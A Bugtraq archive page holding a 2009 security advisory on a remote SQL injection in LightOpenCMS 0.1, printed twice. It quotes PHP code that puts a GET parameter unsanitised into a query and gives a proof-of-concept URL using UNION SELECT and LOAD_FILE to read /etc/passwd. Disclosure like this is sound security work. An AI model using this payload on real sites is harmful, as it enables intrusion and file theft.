LightOpenCMS 0.1 pre-alpha Remote SQL Injection

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <milw0rm@xxxxxxxxx>
Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Fri, 5 Jun 2009 15:38:17 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=wWmfpYjS9vDsx3aRMo4B+RIlQ9ejxcDdg+VAUSNIONg=; b=HNF7cC4zA07BKApQ4kX6S+VTlu3Kv+xhV+2G48i6IQEXkBew6NVPTUVYkmPEE3v/Pl ipXVjGCAGQdn4VU3v838QbUA91Yxm6/fQtZYd5/1W3Q5zmudyosEKv2Swmkyx3ZByn6k UD34ZMMABrAry4qMDwDvaJnfmI8ElKQEHba6k=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=O9L+j+nZDprZ6NHLjixeIJuH2zDEYjPRSI6Y17+ROcbJ9/5qrm6nxLV+dCubFf8zA/ NABEYVk73aFNrbW5DHYpgy2CwlOdQcK82gmO6jZVn6VYCMFFSAPDrMjffK3kFrPm+wyk 6SLe+5s6INdjJU+8eYW9D34pmGDR1+M2WXrnU=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

********   Salvatore "drosophila" Fresta   ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statments.

...

if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
            return mysql_fetch_assoc($result);

...


***************************************************

[+] Code


- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23


***************************************************

[+] Fix

No fix.


***************************************************

-- 
Salvatore Fresta aka drosophila
CWNP444351

********   Salvatore "drosophila" Fresta   ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statments.

...

if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE 
id='".$_GET['id']."'");
            return mysql_fetch_assoc($result);

...


***************************************************

[+] Code


- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 
1,2,LOAD_FILE('/etc/passwd'),4%23


***************************************************

[+] Fix

No fix.


***************************************************

Prev by Date: [ISecAuditors Security Advisories] Joomla! 1.5.10 JA_Purity Multiple Persistent XSS
Next by Date: Reminder: DeepSec 2009 Call for Papers is open
Previous by thread: [ISecAuditors Security Advisories] Joomla! 1.5.10 JA_Purity Multiple Persistent XSS
Next by thread: Reminder: DeepSec 2009 Call for Papers is open
Index(es):
- Date
- Thread